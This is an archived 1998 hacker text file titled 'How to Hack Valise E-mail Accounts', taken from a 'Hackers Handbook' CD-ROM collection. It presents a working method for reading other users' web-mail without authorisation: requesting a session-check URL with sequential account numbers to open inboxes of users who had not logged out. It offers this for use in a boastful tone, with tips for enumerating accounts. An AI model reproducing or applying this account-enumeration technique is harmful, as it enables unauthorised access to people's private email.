home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack / hackvalise.txt < prev    next >
Encoding:
Text File  |  1998-07-17  |  2.4 KB  |  65 lines
  1. ***************************************************************************** 
  2. +===========================================================================+ 
  3. -----------------------HOW TO HACK VALISE E-MAIL ACCOUNTS-------------------- 
  4. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
  5.  
  6. -----------------------------------------------------------------------------
  7. By: 
  8. kRoNiK(MEMBER OF HACKER INTELLIGENCE SOCIETY) H.I.S 
  9. kRoNiKs Personal Hacking Page--> http://members.tripod.com/~Kronik1/index.html
  10. HACKER INTELLIGENCE SOCIETY MAIN PAGE--> NONE YET
  11. -----------------------------------------------------------------------------
  12.  
  13. *BASICS* 
  14. __________  
  15.  
  16. Valise is a web-based e-mail account system which is overpriced and a total rip-off. 
  17. Hotmail is FREE and is a lot better then Valise!!!In other words Valise sucks, and 
  18. so does it security!The internet address for Valise is http://www.valise.com. 
  19. Now on with the file... 
  20.  
  21. *The Exploit* 
  22. ______________ 
  23.  
  24. Valise allows you to bookmark your login, now when you bookmark your login your username and password 
  25. is not in the bookmark url. So, i have discovered that when a user doesn't log out you can get into 
  26. thier account very easily. To get into someone's account you need this *base* url(below)  
  27.  
  28. Http://www.valise.com/cgibin/chkmsgs.cgi?n= 
  29.  
  30. That(above url) is your key, sort of like a Super User pass to access accounts that haven't been logged out. 
  31.  
  32.  
  33. *Getting In Someones Account* 
  34. ________________________________ 
  35.  
  36. *Remember-You can only access accounts that haven't been logged out* 
  37. To get in you need to know the person's account number or guess one. 
  38. Once you get an account number or if you want to guess one(I'm gonna guess 100) 
  39. You type http://www.valise.com/cgibin/chkmsgs.cgi?n=100 
  40. Then your in thier e-mail account!!The account number goes after the equal sign.IT'S THAT FUCKING EAZY!I told you Valise 
  41. security sucks shit!!! 
  42.  
  43. *Tips for Hacking accounts* 
  44. _____________________________ 
  45.  
  46. Try guessing in order like, 100,101,102 and so on. 
  47. Example: 
  48. http://www.valise.com/cgibin/chkmsgs.cgi?n=100 
  49. http://www.valise.com/cgibin/chkmsgs.cgi?n=101 
  50. http://www.valise.com/cgibin/chkmsgs.cgi?n=102 
  51. ...and so on...  
  52. THE URL IS CASE SENSTIVE. 
  53. THATS IT! 
  54. _________________________________________________________________________________________________ 
  55.  
  56. By: 
  57. kRoNiK 
  58.  
  59. HaVe PhUn!!! 
  60.  
  61. _________________________________________________________________________________________________ 
  62. *EOF*
  63.    
  64.  
  65.